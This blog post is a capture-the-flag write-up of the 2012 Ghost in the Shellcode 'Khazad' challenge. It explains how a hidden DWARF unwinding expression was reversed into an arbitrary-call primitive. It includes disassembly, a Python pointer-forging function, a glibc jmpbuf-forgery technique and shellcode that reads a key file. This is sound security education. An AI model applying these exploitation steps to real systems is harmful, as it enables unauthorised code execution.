http://blog.oxff.net/#k6jx7ewsq2bbid6giflq

2012-01-30 12:20

GitS 2012: Khazad (pwn600)

Update: The Eindbazen did a nice write-up after solving the challenge post-mortem: they call functions iteratively with the code execution primitive instead of pivoting to a ROP chain with longjmp, seems a lot easier!

Ghost in the Shellcode CTF 2012 was pretty chaotic and a lot of challenges were broken, stupid guessing around or otherwise frustrating. Nevertheless, I had a lot of fun with the Khazad challenge (which also supposedly was the hardest, at least it was worth the most points).

The challenge came as a ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, stripped and with the information on which host, this binary would be running. Typically, you'd have to get code execution on that machine using a memory corruption bug in the binary at hand. I threw the binary into IDA Pro and started reverse engineering it.

As all the pwn challenge binaries, this binary basically was a forking server, where the main accept loop utility function invokes a parameter function pointer with the client fd as only parameter. Coincidentially, this code looks a lot like the DefCon CTF boiler plate code. Since this 64bit version of it did look like all the 32bit utility code around the actual client handling, I will omit it here.

The client handler first initializes a jmpbuf structure using setjmp; the code taken when upon longjmp will print clean up some heap memory and then return (effectively terminating the connection). This jump is actually taken from the SIGALARM handler installed later. The cleanup code loops over the pointer like over a linked list.

                mov     edi, offset jmpbuf ; env
                mov     rax, fs:28h
                mov     [rsp+1C8h+var_40], rax
                xor     eax, eax
                call    __setjmp
                test    eax, eax
                jz      short loc_401E00
                mov     rdi, cs:ptr     ; ptr
                test    rdi, rdi
                jz      short loc_401DD4
                jmp     short loc_401DB8
; ---------------------------------------------------------------------------
                align 8

loc_401DB8: ; CODE XREF: client_handler_0+42j ; client_handler_0+62aj mov rax, [rdi+18h] mov cs:ptr, rax call _free mov rdi, cs:ptr test rdi, rdi jnz short loc_401DB8

loc_401DD4: ; CODE XREF: client_handler_0+40j

When not returning from the longjmp (and therefore in the normal program flow), the code would then read two 64bit integer values from /dev/urandom into two separate global variables. It initalizes a global ptr, that is also freed in the cleanup code, with zero and a global boolean with true (this value indicates whether to continue receiving input).

                 mov     cs:ptr, 0
                 mov     cs:continue_flag, 1

Then -- in a loop and for each iteration -- the code requires you to send four 64bit integers as input. The second integer read in must be a certain magic number (note that [rsp+1C8h+magic_deadbeef] and rbx are aliased here):

 
                 mov     edi, [rsp+1C8h+fd] ; fd
                 mov     edx, 8          ; n
                 mov     rsi, rbp        ; buf
                 call    readAll
                 mov     edi, [rsp+1C8h+fd] ; fd
                 mov     edx, 8          ; n
                 mov     rsi, rbx        ; buf
                 call    readAll
                 mov     rax, 0DEAD1337BEEFh
                 cmp     [rsp+1C8h+magic_deadbeef], rax
                 jnz     short loc_401E70
                 mov     edi, [rsp+1C8h+fd] ; fd
                 mov     edx, 8          ; n
                 mov     rsi, r15        ; buf
                 call    readAll
                 mov     edi, [rsp+1C8h+fd] ; fd
                 mov     edx, 8          ; n
                 mov     rsi, r14        ; buf
                 call    readAll

The code then compares the first integer ([rsp+1C8h+function_id] and rbp are again aliased) with a set of four function pointers. If it matches one of those, it calls the input as a function pointer. Therefore we can reach only one of the four pre-defined addresses. The third and fourth integers sent are passed as first and second function parameters.

                 mov     rax, [rsp+1C8h+function_id]
                 test    rax, rax
                 jz      loc_401FB0
                 cmp     rax, cs:func1
                 mov     r12, rax
                 jz      loc_401F90
                 cmp     rax, cs:func2
                 jz      short loc_401F90
                 cmp     rax, cs:func3
                 jz      short loc_401F90
                 xor     r12d, r12d
                 cmp     rax, cs:func4
                 jz      short loc_401F85
; ...
 loc_401F85:                             ; CODE XREF: client_handler_0+1B7j
                 mov     r12, rax
                 jmp     short loc_401F90
 ; ---------------------------------------------------------------------------
                 align 10h

loc_401F90: ; CODE XREF: client_handler_0+195j ; client_handler_0+1A2j ... mov edx, [rsp+1C8h+fd] mov rsi, [rsp+1C8h+param_2] mov rdi, [rsp+1C8h+param_1] call r12

Not depicted in the listing above is that the code throws a C++ exception (a std::string describing the error) if the function pointer is not in the predefined set. The whole input handling code is enclosed in a try-catch block that will print the exception string to the client and then read input again in the next loop iteration.

Next, I've examined the four functions available. The references are conveniently stored after each other in the binary. Since they are in .data and receive user input as parameters, I made notice of them as potential overwriting candidates later.

.data:00000000006031A0 func1           dq offset sub_401B70    ; DATA XREF: client_handler_0+18Br
.data:00000000006031A8 func2           dq offset sub_402170    ; DATA XREF: client_handler_0+19Br
.data:00000000006031B0 func3           dq offset sub_401980    ; DATA XREF: client_handler_0+1A4r
.data:00000000006031B8 func4           dq offset sub_401C70    ; DATA XREF: client_handler_0+1B0r

These functions implement a heap linked-list based data storage:

All of those functions check various error conditions and throw a std::string exception. This is handled in the calling function as described earlier.

At this point, I was confused about the safe invocations of malloc and free and hence I tried to dig very deep into list linking and unlinking as I was suspecting a bug there. I did not find a bug, even after about two hours. I imagine, this is where a lot of people gave up.

Fortunately at this point, I googled the name of the challenge, it let me to Wikipedia article. When I read the title "Dwarf (Middle-earth)", it immeditely struck me. The code uses C++ exceptions quite extensively and I knew that the standard describing debug information and exception unwinding information for ELF binaries was DWARF.

A quick $ readelf --debug-dump=frames 5faa7969ec6113e73f002c861f5b1229 revealed some interesting exception unwinding specifications for quite some functions (if you don't know, how all this relates, ask the Internet). Most of those functions contained some evaluation of DWARF code to restore a register value:

DW_CFA_val_expression: r0 (rax) (DW_OP_skip: 19; DW_OP_dup; DW_OP_lit21; DW_OP_shl; DW_OP_swap; DW_OP_const1u: 43; DW_OP_shr; DW_OP_or; DW_OP_constu: 466682695468; DW_OP_dup; DW_OP_skip: 81)

Unfortunately, the static DWARF disassembler in stock binutils does not follow the unconditional DW_OP_skip branches. I've quickly built my own, patched readelf and most of the register expressions simply contain a skip to the end of the expression. There was one expression that stood out (both in length and register not being rax this time):

00000280 0000002c 000000d4 FDE cie=000001b0 pc=00401c70..00401d70
  Augmentation data:     cc 2b 40 00

DW_CFA_def_cfa_offset: 64
  DW_CFA_offset: r6 (rbp) at cfa-32
  DW_CFA_offset: r12 (r12) at cfa-24
  DW_CFA_offset: r13 (r13) at cfa-16
  DW_CFA_offset: r3 (rbx) at cfa-40
  DW_CFA_val_expression: r12 (r12) (DW_OP_reg3 (rbx);
 DW_OP_const8u: 1651338292 1683508844;
 DW_OP_xor;
 DW_OP_skip: -595;
 DW_OP_dup;
 DW_OP_lit21;
 DW_OP_shl;
 DW_OP_swap;
 DW_OP_const1u: 43;
 DW_OP_shr;
 DW_OP_or;
 DW_OP_constu: 466682695468;
 DW_OP_dup;
 DW_OP_skip: 81;
 DW_OP_rot;
 DW_OP_plus;
 DW_OP_dup;
 DW_OP_lit15;
 DW_OP_shl;
 DW_OP_swap;
 DW_OP_const1u: 49;
 DW_OP_shr;
 DW_OP_or;
 DW_OP_plus;
 DW_OP_skip: -62;
 DW_OP_const8u: 4294967295 4294938623;
 DW_OP_and;
 DW_OP_skip: 572;

Looking at the program counter value, this exception unwinding information was defined for, I saw this was for the fourth function, which throws an exception if the first parameter is not zero. Furthermore, when the exception has been caught, r12 is preserved throughout the next loop iteration, where r12 is then used to read the function pointer to call into. Fortunately, we can skip this by sending a zero function pointer. Then r12 is not loaded again but assumed to be still zero. However, the next basic block then just checks if r12 is zero, and if not, invokes it! So by passing a magic value as first parameter (which is what is in rbx when the exception gets thrown) to the exit function and then invoking a zero function, we can actually call an arbitrary function pointer.

Since I did not know any better, I quickly took pen and paper and reversed the stack machine instructions to a formula by hand:

Manually analyzed DWARF code

The inverse function in python then looked like this:

C1 = 0x64584e6c626d6c34L
C2 = 466682695468L

def rol(num, bits): return ((num << bits) & 0xffffffffffffffff) | ((num >> (64 - bits)) & 0xffffffffffffffff)

def mangle(target): target |= 0x7000<<32 target -= C2 target = rol(target, 49) target -= C2 target = rol(target, 43) target ^= C1 return target

And indeed, this let me execute a jump to 0xdeadbeef, controlling the first two parameters.

Now I could jump anywhere I want inside a ASLR'ed, NX'ed executable. Not exactly helpful just yet, even with my arbitrary memory read and constrained write primitives. Therefore, I was planning on some simple return2libc and execute system, since I could also control it's parameter through rdi. Therefore, I dumped the remote PLT using the memory read primitive and tried to find out which libc binary this was using the delta between several functions. Long story short, I did not have such a binary at hand.

But I could read arbitrary memory, so I dumped the entire libc pages from a function pointer back to its ELF header. Unfortunately, none of the ELF tools I know can work on loaded and already dynamically linked memory dumps. So I quickly hacked up my own ELF parser that could resolve functions for me from this dump (which took about almost an hour by itself, it was pretty late already). To my surprise, this technique worked quite fine:

[7950h]     st_name:               system
[7950h]     st_value:              41AD0h
[7950h]     st_shndx:              Ch

When I tried this locally, I suddenly realized that both my local and the remote libc addresses had bits that were masked out by the last DW_OP_and. So they did not want me to simply return2libc, another point where the organizer just added arbitrary frustration... :/

Unfortunately, I could not control much on the stack and did not find a suitable pivot gadget switching the stack to a controlled register either.

But I knew this binary was using longjmp. Since I knew, how longjmp works, I wanted to abuse it: setjmp just saves some register contents, the stack pointer and the calling functions address (from the stack) into a buffer. So I could fake such a buffer with the write primitive and pass this as first parameter to the exit function, later jumping to longjmp and thereby controlling both the stack pointer and the instruction pointer. Or so I thought: as a protection mechanism, glibc these days mangles sensitive pointers (such as the address to jump to) by XOR'ing them against a value in fs and rotating it by 17 bits (whatever that protection is supposed to be good for). Additionally, it contains a sanity check that the new stack pointer is not below the old stack pointer.

I could not determine the position of the fs segment remotely, but the original jmpbuf was stored at a fixed location and I could leak it. By XOR'ing the return address there with the correct return address (derived from the binary at hand), I could restore the cookie and thereby also fake a jmpbuf.

So I modified my exploit to jump to system through longjmp and pass as first parameter a command buffer I had allocated using the second function before. This worked great (with modified offsets) locally, but when I tried this remotely, I did not have any success (believe me, I've tried with tons of commands to just send any sign of life to any fd or via netcat...). Those bastards must have not have any shell in that chroot or whatever! Another stupid frustration factor, I already spent 10 hours on this and it was 6 a.m. in my timezone.

Eventually, I resorted to invoking mprotect on some heap memory, where I had put a custom shellcode and then jump to that shellcode:

libc equ 0x7fdfb4253000
write equ 0xD84F0
getcwd equ 0xD8EC0
exit equ 0x39180
open equ 0xD8120
read equ 0xD8490

mov rsp, rbp

;mov rdi, rsp ;push 0x80 ;pop rsi

;mov rax, libc+getcwd ;call rax

lea rdi, [rel filename] xor rsi, rsi

mov rax, libc+open call rax

mov rdi, rax mov rsi, rsp push 0x100 pop rdx

mov rax, libc+read call rax

push 4 pop rdi mov rsi, rsp push 0x100 pop rdx

mov rax, libc+write jmp rax xor rdi, rdi mov rax, libc+exit jmp rax

filename: db 'key', 0

This was my first 64bit shellcode for Linux and since I was too lazy to look up the calling conventions and I already could determine libc symbol addresses, I just called into libc directly. This was also the first time, I had the joy of using PC relative addressing in shellcode. ;)

At 8 a.m. in the morning and after twelve hours of fiddling with this totally fucked up challenge, I had received the key. Thanks for this truly amazing challenge!

If you liked this write-up, feel free to retweet a link to it.